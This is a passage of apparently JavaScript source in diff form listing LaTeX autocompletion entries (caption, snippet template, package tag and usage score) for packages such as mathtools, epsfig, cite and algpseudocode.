'\\theequation', + snippet: '\\theequation', + meta: 'mathtools-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'mathtools-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'mathtools-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'mathtools-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'mathtools-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'mathtools-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'mathtools-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'mathtools-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: 
'\\int', + meta: 'mathtools-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'mathtools-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'mathtools-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'mathtools-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'mathtools-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'mathtools-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'mathtools-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'mathtools-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'mathtools-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'mathtools-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'mathtools-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'mathtools-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'mathtools-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'mathtools-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'mathtools-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'mathtools-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'mathtools-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'mathtools-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'mathtools-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'mathtools-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'mathtools-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mathtools-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'mathtools-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'mathtools-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'mathtools-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'mathtools-cmd', + score: 
0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'mathtools-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'mathtools-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'mathtools-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'mathtools-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'mathtools-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'mathtools-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'mathtools-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'mathtools-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'mathtools-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'mathtools-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'mathtools-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'mathtools-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'mathtools-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'mathtools-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'mathtools-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'mathtools-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'mathtools-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'mathtools-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'mathtools-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'mathtools-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'mathtools-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'mathtools-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'mathtools-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'mathtools-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'mathtools-cmd', + score: 0.00024247684499275043, + }, + { + 
caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'mathtools-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'mathtools-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mathtools-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'mathtools-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'mathtools-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'mathtools-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'mathtools-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'mathtools-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'mathtools-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'mathtools-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'mathtools-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'mathtools-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'mathtools-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'mathtools-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'mathtools-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'mathtools-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'mathtools-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'mathtools-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'mathtools-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'mathtools-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'mathtools-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'mathtools-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'mathtools-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'mathtools-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'mathtools-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'mathtools-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'mathtools-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'mathtools-cmd', + score: 
0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'mathtools-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'mathtools-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'mathtools-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'mathtools-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'mathtools-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'mathtools-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'mathtools-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'mathtools-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'mathtools-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'mathtools-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'mathtools-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'mathtools-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'mathtools-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'mathtools-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'mathtools-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'mathtools-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'mathtools-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'mathtools-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'mathtools-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'mathtools-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'mathtools-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'mathtools-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'mathtools-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'mathtools-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'mathtools-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'mathtools-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'mathtools-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'mathtools-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'mathtools-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'mathtools-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'mathtools-cmd', + score: 
0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'mathtools-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mathtools-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'mathtools-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mathtools-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathtools-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'mathtools-cmd', + score: 0.0063276692758974925, + }, + ], + verbatim: [ + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'verbatim-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'verbatim-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'verbatim-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'verbatim-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'verbatim-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'verbatim-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'verbatim-cmd', + score: 0.0024547099784948665, + }, + ], + wrapfig: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'wrapfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'wrapfig-cmd', + score: 0.413853376001159, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wrapfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wrapfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\wrapfigure{}{}', + snippet: '\\wrapfigure{$1}{$2}', + meta: 'wrapfig-cmd', + score: 0.0003295435821387379, + }, + ], + epsfig: [ + { + caption: '\\epsfbox{}', + snippet: '\\epsfbox{$1}', + meta: 'epsfig-cmd', + score: 0.00013712781345832882, + }, + { + caption: '\\psfig{}', + snippet: '\\psfig{$1}', + meta: 'epsfig-cmd', + score: 0.0017552046452897515, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'epsfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'epsfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'epsfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'epsfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'epsfig-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'epsfig-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epsfig-cmd', + score: 0.00530510025314411, + 
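
The mathtools entries above follow the file's uniform shape: a display caption, a tab-stop snippet ($1, $2 mark cursor stops after insertion), the owning package in meta, and a corpus-frequency score that orders suggestions. A minimal LaTeX sketch, using only commands catalogued above, of what a few of these completions look like once expanded (the operator name \spn is a hypothetical example):

    \documentclass{article}
    \usepackage{mathtools}            % superset of amsmath
    \DeclareMathOperator{\spn}{span}  % catalogued: \DeclareMathOperator{}{}
    \begin{document}
    \begin{equation}\label{eq:sum}    % catalogued: \label{}
      \dfrac{1}{2} \sum_{i=1}^{n} x_i
        \xrightarrow[n \to \infty]{} \spn(V)
    \end{equation}
    Equation \eqref{eq:sum} cross-references the display above.
    \end{document}
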
}, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'epsfig-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'epsfig-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'epsfig-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsfig-cmd', + score: 0.008565354665444157, + }, + ], + cite: [ + { + caption: '\\citeonline{}', + snippet: '\\citeonline{$1}', + meta: 'cite-cmd', + score: 0.014277840409455324, + }, + { + caption: '\\citenum{}', + snippet: '\\citenum{$1}', + meta: 'cite-cmd', + score: 0.0027420903627423383, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'cite-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'cite-cmd', + score: 2.341195220791228, + }, + ], + lipsum: [ + { + caption: '\\setlipsumdefault{}', + snippet: '\\setlipsumdefault{$1}', + meta: 'lipsum-cmd', + score: 0.00024112945034541791, + }, + { + caption: '\\lipsum[]', + snippet: '\\lipsum[$1]', + meta: 'lipsum-cmd', + score: 0.0300787181624191, + }, + ], + algpseudocode: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algpseudocode-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algpseudocode-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algpseudocode-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algpseudocode-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algpseudocode-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algpseudocode-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algpseudocode-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algpseudocode-cmd', + score: 
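
The cite and lipsum blocks just above are small: cite's completions center on \cite{} and \nocite{}, lipsum's on \lipsum[]. A minimal sketch of the two together, assuming a hypothetical refs.bib with keys knuth1984 and lamport1994:

    \documentclass{article}
    \usepackage{cite}    % sorts and compresses numeric citations
    \usepackage{lipsum}  % filler paragraphs
    \begin{document}
    \lipsum[1]                      % catalogued: \lipsum[]
    As argued in \cite{knuth1984}.  % catalogued: \cite{}; hypothetical key
    \nocite{lamport1994}            % catalogued: \nocite{}; hypothetical key
    \bibliographystyle{plain}
    \bibliography{refs}             % hypothetical bibliography file
    \end{document}
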
0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algpseudocode-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algpseudocode-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algpseudocode-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algpseudocode-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algpseudocode-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algpseudocode-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algpseudocode-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algpseudocode-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algpseudocode-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algpseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algpseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algpseudocode-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algpseudocode-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algpseudocode-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algpseudocode-cmd', + score: 0.0018957469739775527, + }, + ], + textpos: [ + { + caption: '\\textblockorigin{}{}', + snippet: '\\textblockorigin{$1}{$2}', + meta: 'textpos-cmd', + score: 0.016306266556901577, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'textpos-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'textpos-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'textpos-cmd', + score: 0.00037306820619479756, + }, + ], + subfig: [ + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subfig-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'subfig-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\subfloat[]{}', + snippet: '\\subfloat[$1]{$2}', + meta: 'subfig-cmd', + score: 0.0286920437310672, + }, + { + caption: '\\subfloat{}', + snippet: '\\subfloat{$1}', + meta: 'subfig-cmd', + score: 0.0286920437310672, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'subfig-cmd', + score: 0.00037306820619479756, + }, + ], + enumerate: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'enumerate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\makelabel', + snippet: '\\makelabel', + meta: 'enumerate-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel{}', + snippet: '\\makelabel{$1}', + meta: 'enumerate-cmd', + score: 5.739925426740175e-5, + }, + { + 
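
The algpseudocode entries above are mostly customization hooks (\algnewcommand, \algrenewtext, \algdef); everyday use of the package is simpler. A minimal sketch of an algorithmic environment exercising \Statex and \Comment{} from the list:

    \documentclass{article}
    \usepackage{algpseudocode}  % the algorithmicx pseudocode layer
    \begin{document}
    \begin{algorithmic}[1]      % [1]: number every line
      \State $s \gets 0$
      \For{$i = 1, \dots, n$}
        \State $s \gets s + a_i$ \Comment{accumulate}  % catalogued: \Comment{}
      \EndFor
      \Statex                   % catalogued: \Statex (unnumbered blank line)
    \end{algorithmic}
    \end{document}
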
